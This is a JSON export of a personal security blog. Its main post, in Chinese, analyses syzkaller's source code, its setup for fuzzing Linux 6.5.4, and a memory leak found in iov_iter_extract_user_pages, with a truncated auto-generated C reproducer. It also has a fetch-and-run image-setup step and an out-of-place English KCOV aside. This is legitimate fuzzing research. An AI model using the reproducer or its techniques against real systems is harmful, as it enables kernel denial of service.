{"meta":{"title":"V3rdant's Blog","subtitle":"","description":"","author":"V3rdant","url":"https://v3rdant.cn","root":"/"},"pages":[{"title":"About","date":"2024-01-26T14:29:02.754Z","updated":"2024-01-26T14:29:02.754Z","comments":false,"path":"about/index.html","permalink":"https://v3rdant.cn/about/index.html","excerpt":"","text":"Coder & CTFer in WHU@noname team. I focus on the pwn and fuzz. As a pwner, now i more interest in kernel and broser. Communicate with me: [email protected]"},{"title":"categories","date":"2019-05-03T04:03:35.000Z","updated":"2024-03-03T07:21:00.893Z","comments":true,"path":"categories/index.html","permalink":"https://v3rdant.cn/categories/index.html","excerpt":"","text":""},{"title":"Links","date":"2023-05-20T13:50:09.077Z","updated":"2023-05-20T13:50:09.077Z","comments":false,"path":"links/index.html","permalink":"https://v3rdant.cn/links/index.html","excerpt":"","text":""},{"title":"Repositories","date":"2023-04-25T07:27:03.633Z","updated":"2023-04-25T07:27:03.633Z","comments":false,"path":"repository/index.html","permalink":"https://v3rdant.cn/repository/index.html","excerpt":"","text":""},{"title":"tags","date":"2019-05-03T04:03:35.000Z","updated":"2024-03-03T07:19:29.005Z","comments":true,"path":"tags/index.html","permalink":"https://v3rdant.cn/tags/index.html","excerpt":"","text":""},{"title":"tags","date":"2024-03-03T07:18:57.000Z","updated":"2024-03-03T07:18:57.227Z","comments":true,"path":"tags/index-1.html","permalink":"https://v3rdant.cn/tags/index-1.html","excerpt":"","text":""}],"posts":[{"title":"Fuzz.Kernel-Fuzz-With-Syzkaller","slug":"Fuzz.Kernel-Fuzz-With-Syzkaller","date":"2024-03-01T07:39:31.000Z","updated":"2024-03-05T02:05:02.015Z","comments":true,"path":"Fuzz.Kernel-Fuzz-With-Syzkaller/","link":"","permalink":"https://v3rdant.cn/Fuzz.Kernel-Fuzz-With-Syzkaller/","excerpt":"为啥要做?做完后有何收获感想体会?","text":"overview 这一篇是笔者在上一门同linux有关的专选课程时的结课报告。 以笔者现在的眼光来看,这篇文章有相当的糊弄学的成分。笔者在阅读源代码的过程中,过多地关注了工程性的实现,而没有触及fuzz领域最核心的问题: syzkaller是如何抽象结构化的输入的 syzkaller的种子变异策略 这些部分笔者将在闲暇时间来补全,留在此处的,就暂且是一篇流水帐式的源代码阅读文章了 linux内核漏洞挖掘技术概要 当前,软件的自动化漏洞利用主要有以下三种技术: 符号执行、模糊测试(Fuzz)、污点分析。 其中,linux内核作为一个逻辑复杂的庞大项目,采用符号执行和污点分析的方法,在运行时间上开销过大,因此,目前广泛使用的方法是模糊测试(Fuzz)。 模糊测试指通过种子产生大量输入,然后根据运行信息对种子进行变异,引导产生新的输入语料,并运行测试的过程。 目前通行的内核测试框架是有Google 开源的syzkaller。 syzkaller仍然是基于覆盖率引导的fuzz框架,特别之处在于,由于内核给用户态的接口是一系列的系统调用,因此,syzkaller 将内核测试输入抽象化为一系列系统调用,采用syz-manager和syz-fuzzer的双端架构,实现了内核漏洞的快速挖掘 TODO [ ] 变异策略 [ ] 语料生成 [ ] syzlang书写 syzkaller 源代码分析 syzkaller 源代码如图,存在三个核心组件: syz-fuzzer syz-manager syz-executor syz-manager 进程启动、监视和重新启动多个 VM 实例,并在 VM 内启动 syz-fuzzer 进程。 syz-manager 负责长时间存储输入语料和崩溃报告。 一般在host机器上运行。 syz-fuzzer 进程运行在待测试VM中。 syz-fuzzer 指导模糊测试过程(输入生成、变异、最小化等),并通过 RPC 将触发新覆盖范围的输入发送回 syz-manager 进程。 它还负责启动 syz-executor 进程。 每个 syz-executor 进程执行一个输入(一系列系统调用)。 它接受从 syz-fuzzer 进程执行的程序并将结果发送回。 使用用 C++ 编写,编译为静态二进制文件并使用共享内存进行通信。 syz-fuzzer main fuzzer初始化 1234567891011121314debug.SetGCPercent(50)var ( flagName = flag.String("name", "test", "unique name for manager") flagOS = flag.String("os", runtime.GOOS, "target OS") flagArch = flag.String("arch", runtime.GOARCH, "target arch") flagManager = flag.String("manager", "", "manager rpc address") flagProcs = flag.Int("procs", 1, "number of parallel test processes") flagOutput = flag.String("output", "stdout", "write programs to none/stdout/dmesg/file") flagTest = flag.Bool("test", false, "enable image testing mode") // used by syz-ci flagRunTest = flag.Bool("runtest", false, "enable program testing mode") // used by pkg/runtest flagRawCover = 
flag.Bool("raw_cover", false, "fetch raw coverage"))defer tool.Init()() 首先获取了相关参数。 12345678shutdown := make(chan struct{})osutil.HandleInterrupts(shutdown)go func() { // 应对GCE的抢占 <-shutdown log.Logf(0, "SYZ-FUZZER: PREEMPTED") os.Exit(1)}() 然后启动了一个协程实现来检测shutdown信号,如果出现shutdown,需要停机并退出。 连接manager 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950log.Logf(1, "connecting to manager...") a := &rpctype.ConnectArgs{ Name: *flagName, MachineInfo: machineInfo, Modules: modules, } r := &rpctype.ConnectRes{} // 建立rpc链接 if err := manager.Call("Manager.Connect", a, r); err != nil { log.SyzFatalf("failed to call Manager.Connect(): %v ", err) } featureFlags, err := csource.ParseFeaturesFlags("none", "none", true) // 对于一些功能选项的处理 if err != nil { log.SyzFatalf("%v", err) } if r.CoverFilterBitmap != nil { if err := osutil.WriteFile("syz-cover-bitmap", r.CoverFilterBitmap); err != nil { log.SyzFatalf("failed to write syz-cover-bitmap: %v", err) } } if r.CheckResult == nil { checkArgs.gitRevision = r.GitRevision checkArgs.targetRevision = r.TargetRevision checkArgs.enabledCalls = r.EnabledCalls checkArgs.allSandboxes = r.AllSandboxes checkArgs.featureFlags = featureFlags r.CheckResult, err = checkMachine(checkArgs) if err != nil { if r.CheckResult == nil { r.CheckResult = new(rpctype.CheckArgs) } r.CheckResult.Error = err.Error() } r.CheckResult.Name = *flagName if err := manager.Call("Manager.Check", r.CheckResult, nil); err != nil { log.SyzFatalf("Manager.Check call failed: %v", err) } if r.CheckResult.Error != "" { log.SyzFatalf("%v", r.CheckResult.Error) } } else { target.UpdateGlobs(r.CheckResult.GlobFiles) if err = host.Setup(target, r.CheckResult.Features, featureFlags, config.Executor); err != nil { log.SyzFatalf("%v", err) } } log.Logf(0, "syscalls: %v", len(r.CheckResult.EnabledCalls[sandbox])) for _, feat := range r.CheckResult.Features.Supported() { log.Logf(0, "%v: %v", feat.Name, feat.Reason) } createIPCConfig(r.CheckResult.Features, config) 接下来启动进程连接syz-manager。manager 会检查本机环境并返回检查结果,然后根据检查结果设置一些执行选项,准备沙箱环境。 fuzzer process 123456789log.Logf(0, "starting %v fuzzer processes", *flagProcs)for pid := 0; pid < *flagProcs; pid++ { proc, err := newProc(fuzzer, pid) if err != nil { log.SyzFatalf("failed to create proc: %v", err) } fuzzer.procs = append(fuzzer.procs, proc) go proc.loop()} 接下来根据配置启动N个fuzz协程,每个协程对应一个VM实例。 1fuzzer.pollLoop() proc.loop proc.loop是进程运行的核心代码 12345678func (proc *Proc) loop() { generatePeriod := 100 if proc.fuzzer.config.Flags&ipc.FlagSignal == 0 { // If we don't have real coverage signal, generate programs more frequently // because fallback signal is weak. 
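(The "real coverage signal" this comment refers to is ultimately produced by the kernel's KCOV interface, which is also why CONFIG_KCOV=y appears in the kernel configuration later in this post. For reference, a minimal standalone KCOV client, adapted from the kernel's Documentation/dev-tools/kcov.rst, looks roughly like the sketch below. It is illustrative only: syz-executor's real setup (cover_open(), thread_mmap_cover(), the coverage filter bitmap) is considerably more involved.)

/* Minimal KCOV client, adapted from Documentation/dev-tools/kcov.rst.
 * Collects the kernel PCs executed by this thread during one syscall. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define KCOV_INIT_TRACE _IOR('c', 1, unsigned long)
#define KCOV_ENABLE     _IO('c', 100)
#define KCOV_DISABLE    _IO('c', 101)
#define COVER_SIZE      (64 << 10)      /* buffer size, in unsigned longs */
#define KCOV_TRACE_PC   0               /* collect PCs (as opposed to comparison operands) */

int main(void)
{
    int fd = open("/sys/kernel/debug/kcov", O_RDWR);
    if (fd == -1) { perror("open"); return 1; }
    if (ioctl(fd, KCOV_INIT_TRACE, COVER_SIZE)) { perror("init"); return 1; }
    unsigned long *cover = mmap(NULL, COVER_SIZE * sizeof(unsigned long),
                                PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (cover == MAP_FAILED) { perror("mmap"); return 1; }
    if (ioctl(fd, KCOV_ENABLE, KCOV_TRACE_PC)) { perror("enable"); return 1; }
    __atomic_store_n(&cover[0], 0, __ATOMIC_RELAXED);   /* cover[0] holds the PC count */

    read(-1, NULL, 0);                  /* the syscall whose kernel coverage we want */

    unsigned long n = __atomic_load_n(&cover[0], __ATOMIC_RELAXED);
    for (unsigned long i = 0; i < n; i++)
        printf("0x%lx\n", cover[i + 1]);

    ioctl(fd, KCOV_DISABLE, 0);
    munmap(cover, COVER_SIZE * sizeof(unsigned long));
    close(fd);
    return 0;
}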
generatePeriod = 2 } // 这部分代码在控制测试用例生成的频率。 判断配置是否没有启用真实的覆盖信号反馈(real coverage signal)。 如果没有启用真实覆盖信号,则将 generatePeriod 置为2,意味着每2个循环就随机生成一个新的测试用例。 之所以这么做是因为,如果没有真实的覆盖信号,只依赖fallback signal,那么信号会很弱。因此需要更频繁地生成新的测试用例来弥补。 123456789101112131415for i := 0; ; i++ { item := proc.fuzzer.workQueue.dequeue() if item != nil { switch item := item.(type) { case *WorkTriage: proc.triageInput(item) case *WorkCandidate: proc.execute(proc.execOpts, item.p, item.flags, StatCandidate) case *WorkSmash: proc.smashInput(item) default: log.SyzFatalf("unknown work type: %#v", item) } continue } 每次从 workQueue 中取出一个测试用例,并根据测试用例的不同类型来解析 123456789101112131415161718 ct := proc.fuzzer.choiceTable fuzzerSnapshot := proc.fuzzer.snapshot() if len(fuzzerSnapshot.corpus) == 0 || i%generatePeriod == 0 { // 产生新进程 p := proc.fuzzer.target.Generate(proc.rnd, prog.RecommendedCalls, ct) log.Logf(1, "#%v: generated", proc.pid) proc.executeAndCollide(proc.execOpts, p, ProgNormal, StatGenerate) } else { // 变异已经存在的进程 p := fuzzerSnapshot.chooseProgram(proc.rnd).Clone() p.Mutate(proc.rnd, prog.RecommendedCalls, ct, proc.fuzzer.noMutate, fuzzerSnapshot.corpus) log.Logf(1, "#%v: mutated", proc.pid) proc.executeAndCollide(proc.execOpts, p, ProgNormal, StatFuzz) } }} 获取choice table和corpus的快照copy。 根据条件选择逻辑: 如果corpus为空或每100次循环执行一次,则通过Generate完全随机生成一个新的测试用例prog; 否则,从corpus中随机选择一个case作为基础,通过Mutate进行变异生成新的prog。 生成的prog通过executeAndCollide执行和碰撞检测。 fuzzer.pollLoop 主线程在启动这些协程之后所需要做的工作其实就是响应这些协程的请求,并负责与 syz-manager 间进行 RPC 通信,通过一个不会返回的 pollLoop() 函数完成,该函数核心其实就是一个无限循环: 循环等待 ticker (每 3s 响应一次的计时器)或 fuzzer.needPoll 这两个 channel 之一有数据传来 如果是 fuzzer.needPoll1 传来请求或是距离上次 poll 的时间大于 10s: 检查 workQueue 是否需要新的 candidate(candidate 数量少于 executor 数量),若不是且本次请求处理为 fuzzer.needPoll 传来请求,则等到到距离上次 poll 的时间大于 10s。 收集 executor 数据,调用 poll() 通过 RPC 向 syz-manager 获取新的 candidate 1234567891011121314151617181920212223242526272829303132333435363738394041424344func (fuzzer *Fuzzer) pollLoop() { var execTotal uint64 var lastPoll time.Time var lastPrint time.Time ticker := time.NewTicker(3 * time.Second * fuzzer.timeouts.Scale).C for { poll := false select { case <-ticker: case <-fuzzer.needPoll: poll = true } // 循环等待 `ticker` (每 3s 响应一次的计时器)或 `fuzzer.needPoll` // 这两个 channel 之一有数据传来 if fuzzer.outputType != OutputStdout && time.Since(lastPrint) > 10*time.Second*fuzzer.timeouts.Scale { // 如果是 `fuzzer.needPoll1` 传来请求或是距离上次 poll 的时间大于 10s: log.Logf(0, "alive, executed %v", execTotal) lastPrint = time.Now() } if poll || time.Since(lastPoll) > 10*time.Second*fuzzer.timeouts.Scale { needCandidates := fuzzer.workQueue.wantCandidates() if poll && !needCandidates { continue } // 检查 workQueue 是否需要新的 candidate(candidate 数量少于 executor 数量) // 若不是且本次请求处理为 `fuzzer.needPoll` 传来请求 // 则等到到距离上次 poll 的时间大于 10s stats := make(map[string]uint64) for _, proc := range fuzzer.procs { stats["exec total"] += atomic.SwapUint64(&proc.env.StatExecs, 0) stats["executor restarts"] += atomic.SwapUint64(&proc.env.StatRestarts, 0) } // 收集 executor 数据,调用 poll() 通过 RPC 向 syz-manager 获取新的 candidate for stat := Stat(0); stat < StatCount; stat++ { v := atomic.SwapUint64(&fuzzer.stats[stat], 0) stats[statNames[stat]] = v execTotal += v } if !fuzzer.poll(needCandidates, stats) { lastPoll = time.Now() } } }} syz-manager main 12345678910111213141516func main() { if prog.GitRevision == "" { log.Fatalf("bad syz-manager build: build with make, run bin/syz-manager") } flag.Parse() // 解析参数 log.EnableLogCaching(1000, 1<<20) cfg, err := mgrconfig.LoadFile(*flagConfig) if err != nil { log.Fatalf("%v", err) } if cfg.DashboardAddr != "" { // 
This lets better distinguish logs of individual syz-manager instances. log.SetName(cfg.Name) } RunManager(cfg) // 真正的启动函数} 主要是解析参数和配置文件,然后调用RunManager RunManager 123456789101112var vmPool *vm.Pool // Type "none" is a special case for debugging/development when manager // does not start any VMs, but instead you start them manually // and start syz-fuzzer there. if cfg.Type != "none" { var err error vmPool, err = vm.Create(cfg, *flagDebug) if err != nil { log.Fatalf("%v", err) } } 首先创建了vmPool , 用来管理VM资源 1234567crashdir := filepath.Join(cfg.Workdir, "crashes")osutil.MkdirAll(crashdir)reporter, err := report.NewReporter(cfg)if err != nil { log.Fatalf("%v", err)} 然后初始化了测试语料库并创建了crash的记录文件, 接着初始化了一个HTTP服务器,用来在本地端口以Web页面的形式呈现测试结果 1234mgr.preloadCorpus() // 准备输入语料mgr.initStats() // 初始化一状态变量mgr.initHTTP() // 初始化了一个HTTP服务器mgr.collectUsedFiles() // 收集使用过的文件 1234567891011121314151617181920212223242526go func() { for lastTime := time.Now(); ; { time.Sleep(10 * time.Second) now := time.Now() diff := now.Sub(lastTime) lastTime = now mgr.mu.Lock() if mgr.firstConnect.IsZero() { mgr.mu.Unlock() continue } mgr.fuzzingTime += diff * time.Duration(atomic.LoadUint32(&mgr.numFuzzing)) executed := mgr.stats.execTotal.get() crashes := mgr.stats.crashes.get() corpusCover := mgr.stats.corpusCover.get() corpusSignal := mgr.stats.corpusSignal.get() maxSignal := mgr.stats.maxSignal.get() triageQLen := len(mgr.candidates) mgr.mu.Unlock() numReproducing := atomic.LoadUint32(&mgr.numReproducing) numFuzzing := atomic.LoadUint32(&mgr.numFuzzing) log.Logf(0, "VMs %v, executed %v, cover %v, signal %v/%v, crashes %v, repro %v, triageQLen %v", numFuzzing, executed, corpusCover, corpusSignal, maxSignal, crashes, numReproducing, triageQLen) }}() 这部分代码定义了一个匿名goroutine函数,主要完成了以下工作: 定义一个循环,按照10秒的间隔周期性执行 计算从上次统计到当前时间段的执行时间差值diff 获取mgr对象的各种统计指标: execTotal: 执行的测试用例总数 crashes: 崩溃的测试用例数 corpusCover: 测试用例覆盖的代码行数 corpusSignal/maxSignal: 获取的代码覆盖信号总值和最大信号值 triageQLen: 等待处理的候选测试用例数 加载处理测试用例的虚拟机数量,复现测试的用例数等指标 将上述统计指标打印输出一次日志 12345678osutil.HandleInterrupts(vm.Shutdown) if mgr.vmPool == nil { log.Logf(0, "no VMs started (type=none)") log.Logf(0, "you are supposed to start syz-fuzzer manually as:") log.Logf(0, "syz-fuzzer -manager=manager.ip:%v [other flags as necessary]", mgr.serv.port) <-vm.Shutdown return } 实现了针对VM corruption的处理 1mgr.vmLoop() 最后是一个主循环,用来做任务处理 manager.vmLoop 123456789101112131415log.Logf(0, "booting test machines...")log.Logf(0, "wait for the connection from test machine...")instancesPerRepro := 3vmCount := mgr.vmPool.Count()maxReproVMs := vmCount - mgr.cfg.FuzzingVMsif instancesPerRepro > maxReproVMs && maxReproVMs > 0 { instancesPerRepro = maxReproVMs}instances := SequentialResourcePool(vmCount, 10*time.Second*mgr.cfg.Timeouts.Scale)runDone := make(chan *RunResult, 1)pendingRepro := make(map[*Crash]bool)reproducing := make(map[string]bool)var reproQueue []*CrashreproDone := make(chan *ReproResult, 1)stopPending := false 首先初始化了一些变量,用来通信和复现 123mgr.mu.Lock()phase := mgr.phasemgr.mu.Unlock() 加锁访问 mgr 的相关变量 123456789101112131415for crash := range pendingRepro { if reproducing[crash.Title] { continue } delete(pendingRepro, crash) if !mgr.needRepro(crash) { continue } log.Logf(1, "loop: add to repro queue '%v'", crash.Title) reproducing[crash.Title] = true reproQueue = append(reproQueue, crash)}log.Logf(1, "loop: phase=%v shutdown=%v instances=%v/%v %+v repro: pending=%v reproducing=%v queued=%v", phase, shutdown == nil, instances.Len(), vmCount, instances.Snapshot(), len(pendingRepro), len(reproducing), len(reproQueue)) 
对于没有尝试过复现的crash,加入复现队列 123456789101112131415161718192021222324252627282930313233343536canRepro := func() bool { return phase >= phaseTriagedHub && len(reproQueue) != 0 && (int(atomic.LoadUint32(&mgr.numReproducing))+1)*instancesPerRepro <= maxReproVMs} // 设置了一个闭包判断当前能否启动复现任务if shutdown != nil { // 如果当前可以启动复现任务 for canRepro() { vmIndexes := instances.Take(instancesPerRepro) // 找到一个可用的VM if vmIndexes == nil { break } last := len(reproQueue) - 1 crash := reproQueue[last] reproQueue[last] = nil reproQueue = reproQueue[:last] atomic.AddUint32(&mgr.numReproducing, 1) log.Logf(0, "loop: starting repro of '%v' on instances %+v", crash.Title, vmIndexes) go func() { reproDone <- mgr.runRepro(crash, vmIndexes, instances.Put) }() // 启动一个协程,在可用VM上开始复现crash } for !canRepro() { idx := instances.TakeOne() if idx == nil { break } log.Logf(1, "loop: starting instance %v", *idx) go func() { crash, err := mgr.runInstance(*idx) runDone <- &RunResult{*idx, crash, err} }() // 直接重启VM }} 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263wait: select { case <-instances.Freed: // 一个实例被释放 case stopRequest <- true: log.Logf(1, "loop: issued stop request") stopPending = true case res := <-runDone: log.Logf(1, "loop: instance %v finished, crash=%v", res.idx, res.crash != nil) if res.err != nil && shutdown != nil { log.Logf(0, "%v", res.err) } stopPending = false instances.Put(res.idx) // 如果qemu的shutdown信号为singnal 2 // 将其设定为失去连接而不是crash if shutdown != nil && res.crash != nil { needRepro := mgr.saveCrash(res.crash) if needRepro { log.Logf(1, "loop: add pending repro for '%v'", res.crash.Title) pendingRepro[res.crash] = true } } case res := <-reproDone: atomic.AddUint32(&mgr.numReproducing, ^uint32(0)) crepro := false title := "" if res.repro != nil { crepro = res.repro.CRepro title = res.repro.Report.Title } log.Logf(0, "loop: repro on %+v finished '%v', repro=%v crepro=%v desc='%v'", res.instances, res.report0.Title, res.repro != nil, crepro, title) if res.err != nil { reportReproError(res.err) } delete(reproducing, res.report0.Title) if res.repro == nil { if !res.hub { mgr.saveFailedRepro(res.report0, res.stats) } } else { mgr.saveRepro(res) } case <-shutdown: log.Logf(1, "loop: shutting down...") shutdown = nil case crash := <-mgr.hubReproQueue: log.Logf(1, "loop: get repro from hub") pendingRepro[crash] = true case reply := <-mgr.needMoreRepros: reply <- phase >= phaseTriagedHub && len(reproQueue)+len(pendingRepro)+len(reproducing) == 0 goto wait case reply := <-mgr.reproRequest: repros := make(map[string]bool) for title := range reproducing { repros[title] = true } reply <- repros goto wait }} 这部分代码是用来实现虚拟机管理的核心代码: instances.Freed: 处理空闲的虚拟机实例 stopRequest:发出停止虚拟机的请求 runDone: 处理虚拟机运行结束的结果 如果运行失败,打印错误 释放实例,增加到空闲池 如果本次运行触发了crash,保存crash并添加到待repro队列 reproDone: 处理repro结束的结果 更新repro任务计数 打印repro的结果 如果repro失败,记录信息 从正在repro列表删除 根据repro的结果保存信息 shutdown: 检测到关闭信号,开始关闭 hubReproQueue: 从主机获取的待repro crash needMoreRepros: 返回还有待repro的crash状态 reproRequest: 返回当前正在repro的crash列表 sys-executor sys-executor 是一个使用C++写的执行器,用来真正执行 测试语料 12345678910111213141516171819202122232425262728293031 if (argc == 2 && strcmp(argv[1], "version") == 0) { puts(GOOS " " GOARCH " " SYZ_REVISION " " GIT_REVISION); return 0; } if (argc >= 2 && strcmp(argv[1], "setup") == 0) { setup_features(argv + 2, argc - 2); return 0; } if (argc >= 2 && strcmp(argv[1], "leak") == 0) {#if SYZ_HAVE_LEAK_CHECK check_leaks(argv + 2, argc - 2);#else fail("leak checking is not implemented");#endif return 0; } if (argc 
>= 2 && strcmp(argv[1], "setup_kcsan_filterlist") == 0) {#if SYZ_HAVE_KCSAN setup_kcsan_filterlist(argv + 2, argc - 2, true);#else fail("KCSAN is not implemented");#endif return 0; } if (argc == 2 && strcmp(argv[1], "test") == 0) return run_tests(); if (argc < 2 || strcmp(argv[1], "exec") != 0) { fprintf(stderr, "unknown command"); return 1; } 程序首先解析了一系列参数 1234567891011121314 start_time_ms = current_time_ms(); // 设置fuzz启动时间 os_init(argc, argv, (char*)SYZ_DATA_OFFSET, SYZ_NUM_PAGES * SYZ_PAGE_SIZE); // 初始化系统调用 current_thread = &threads[0];#if SYZ_EXECUTOR_USES_SHMEM void* mmap_out = mmap(NULL, kMaxInput, PROT_READ, MAP_PRIVATE, kInFd, 0);#else void* mmap_out = mmap(NULL, kMaxInput, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0); // 设置输出共享内存#endif if (mmap_out == MAP_FAILED) fail("mmap of input file failed"); input_data = static_cast<char*>(mmap_out); 123456789#if SYZ_EXECUTOR_USES_SHMEM mmap_output(kInitialOutput); // Prevent test programs to mess with these fds. // Due to races in collider mode, a program can e.g. ftruncate one of these fds, // which will cause fuzzer to crash. close(kInFd);#if !SYZ_EXECUTOR_USES_FORK_SERVER close(kOutFd);#endif 接下来是一些准备工作 12345678 use_temporary_dir(); // 创建临时目录 install_segv_handler(); // 设置了段错误信号(SIGSEGV、SIGBUS)的处理函数为segv_handler setup_control_pipes(); // 重定位标准输入和输出到pipe,便于错误#if SYZ_EXECUTOR_USES_FORK_SERVER receive_handshake(); // 确定连接状态#else receive_execute(); // 从管道读取执行请求execute_req#endif 然后是关于测试覆盖率的计算: 1234567891011121314151617181920212223242526272829303132333435 if (flag_coverage) { int create_count = kCoverDefaultCount, mmap_count = create_count; if (flag_delay_kcov_mmap) { create_count = kCoverOptimizedCount; mmap_count = kCoverOptimizedPreMmap; } if (create_count > kMaxThreads) create_count = kMaxThreads; // 计算需要传见的文件数量 for (int i = 0; i < create_count; i++) { threads[i].cov.fd = kCoverFd + i; // 创建覆盖率文件描述符 cover_open(&threads[i].cov, false); if (i < mmap_count) { // Pre-mmap coverage collection for some threads. This should be enough for almost // all programs, for the remaning few ones coverage will be set up when it's needed. thread_mmap_cover(&threads[i]); // 对部分线程提前进行覆盖率mmap,这对大多数程序已经足够 //Remaining的线程会在需要时再设置 } } char sep = '/';#if GOOS_windows sep = '\\\\';#endif char filename[1024] = {0}; char* end = strrchr(argv[0], sep); size_t len = end - argv[0]; strncpy(filename, argv[0], len + 1); strncat(filename, "syz-cover-bitmap", 17); filename[sizeof(filename) - 1] = '\\0'; init_coverage_filter(filename); // 创建覆盖率的bitmap文件 } 然后开始创建执行sandbox: 123456789101112131415161718192021 int status = 0; if (flag_sandbox_none) status = do_sandbox_none(); #if SYZ_HAVE_SANDBOX_SETUID else if (flag_sandbox_setuid) status = do_sandbox_setuid(); // 设置setuid沙箱#endif #if SYZ_HAVE_SANDBOX_NAMESPACE else if (flag_sandbox_namespace) status = do_sandbox_namespace(); // 设置namespace沙箱#endif #if SYZ_HAVE_SANDBOX_ANDROID else if (flag_sandbox_android) status = do_sandbox_android(sandbox) // 设置 android沙箱#endif else fail("unknown sandbox type"); 最后执行错误处理 12345678910111213141516171819#if SYZ_EXECUTOR_USES_FORK_SERVER fprintf(stderr, "loop exited with status %d\\n", status); // Other statuses happen when fuzzer processes manages to kill loop, e.g. with: // ptrace(PTRACE_SEIZE, 1, 0, 0x100040) if (status != kFailStatus) status = 0; // If an external sandbox process wraps executor, the out pipe will be closed // before the sandbox process exits this will make ipc package kill the sandbox. 
// As the result sandbox process will exit with exit status 9 instead of the executor // exit status (notably kFailStatus). So we duplicate the exit status on the pipe. reply_execute(status); doexit(status); // Unreachable. return 1; #else reply_execute(status); return status; #endif } 使用syzkaller进行漏洞挖掘 环境配置 编译syzkaller: 123$ go get -u -d github.com/google/syzkaller/prog$ cd gopath/src/github.com/google/syzkaller/$ make 编译目标内核的内核版本是linux-6.5.4 开启相关debug选项: 123456CONFIG_KCOV=yCONFIG_DEBUG_INFO=yCONFIG_KASAN=yCONFIG_KASAN_INLINE=yCONFIG_CONFIGFS_FS=yCONFIG_SECURITYFS=y 创建镜像: 123456$ sudo apt-get install debootstrap$ mkdir image$ cd image$ wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh$ chmod +x create-image.sh$ ./create-image.sh qemu启动脚本和qemu.cfg如下: 运行syzkaller 在经过3、4天的运行后,结果如下: 漏洞分析 这里选择 memory leak in iov_iter_extract_pages 来进行分析。 首先查看crash时的函数调用栈: 定位 iov_iter_exxtract_pages 函数, 这个函数从基于用户空间内存的迭代器中提取出一组连续的页面,并对这些页面加锁pin。 12345678910111213141516171819202122232425262728293031323334353637// lib/iov_iter.cstatic ssize_t iov_iter_extract_user_pages(struct iov_iter *i, struct page ***pages, size_t maxsize, unsigned int maxpages, iov_iter_extraction_t extraction_flags, size_t *offset0){ unsigned long addr; unsigned int gup_flags = 0; size_t offset; int res; if (i->data_source == ITER_DEST) gup_flags |= FOLL_WRITE; if (extraction_flags & ITER_ALLOW_P2PDMA) gup_flags |= FOLL_PCI_P2PDMA; if (i->nofault) gup_flags |= FOLL_NOFAULT; addr = first_iovec_segment(i, &maxsize); *offset0 = offset = addr % PAGE_SIZE; addr &= PAGE_MASK; maxpages = want_pages_array(pages, maxsize, offset, maxpages); if (!maxpages) return -ENOMEM; // 根据迭代器的信息,计算出需要提取的用户空间地址范围。 res = pin_user_pages_fast(addr, maxpages, gup_flags, *pages); // 调用pin_user_pages_fast()对该地址范围内的页面加锁 if (unlikely(res <= 0)) return res; maxsize = min_t(size_t, maxsize, res * PAGE_SIZE - offset); // 根据实际加锁的页面数量,计算迭代器可以前进的最大长度。 iov_iter_advance(i, maxsize); // 调用iov_iter_advance()移动迭代器。 return maxsize;} 而syzkaller给出的漏洞是memory leak,即存在分配未释放的内存。 在wamt_pages_array 三个函数中筛选 123456789101112131415static int want_pages_array(struct page ***res, size_t size, size_t start, unsigned int maxpages){ unsigned int count = DIV_ROUND_UP(size + start, PAGE_SIZE); if (count > maxpages) count = maxpages; WARN_ON(!count); // caller should've prevented that if (!*res) { *res = kvmalloc_array(count, sizeof(struct page *), GFP_KERNEL); if (!*res) return 0; } return count;} 发现只有 want_pages_array 中存在堆内存分配。 如果: 12if (unlikely(res <= 0)) return res; 此时,程序错误返回,前面分配的pages空间却并没有被释放,因此,会引发内存泄漏。 复现的C代码如下: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234// autogenerated by syzkaller (https://github.com/google/syzkaller)#define _GNU_SOURCE #include <dirent.h>#include <endian.h>#include <errno.h>#include <fcntl.h>#include <signal.h>#include <stdarg.h>#include <stdbool.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/prctl.h>#include <sys/stat.h>#include 
<sys/syscall.h>#include <sys/types.h>#include <sys/wait.h>#include <time.h>#include <unistd.h>static void sleep_ms(uint64_t ms){ usleep(ms * 1000);}static uint64_t current_time_ms(void){ struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;}static bool write_file(const char* file, const char* what, ...){ char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true;}static void kill_and_wait(int pid, int* status){ kill(-pid, SIGKILL); kill(pid, SIGKILL); for (int i = 0; i < 100; i++) { if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); } DIR* dir = opendir("/sys/fs/fuse/connections"); if (dir) { for (;;) { struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); int fd = open(abort, O_WRONLY); if (fd == -1) { continue; } if (write(fd, abort, 1) < 0) { } close(fd); } closedir(dir); } else { } while (waitpid(-1, status, __WALL) != pid) { }}static void setup_test(){ prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file("/proc/self/oom_score_adj", "1000");}#define KMEMLEAK_FILE "/sys/kernel/debug/kmemleak"static void setup_leak(){ if (!write_file(KMEMLEAK_FILE, "scan")) exit(1); sleep(5); if (!write_file(KMEMLEAK_FILE, "scan")) exit(1); if (!write_file(KMEMLEAK_FILE, "clear")) exit(1);}static void check_leaks(void){ int fd = open(KMEMLEAK_FILE, O_RDWR); if (fd == -1) exit(1); uint64_t start = 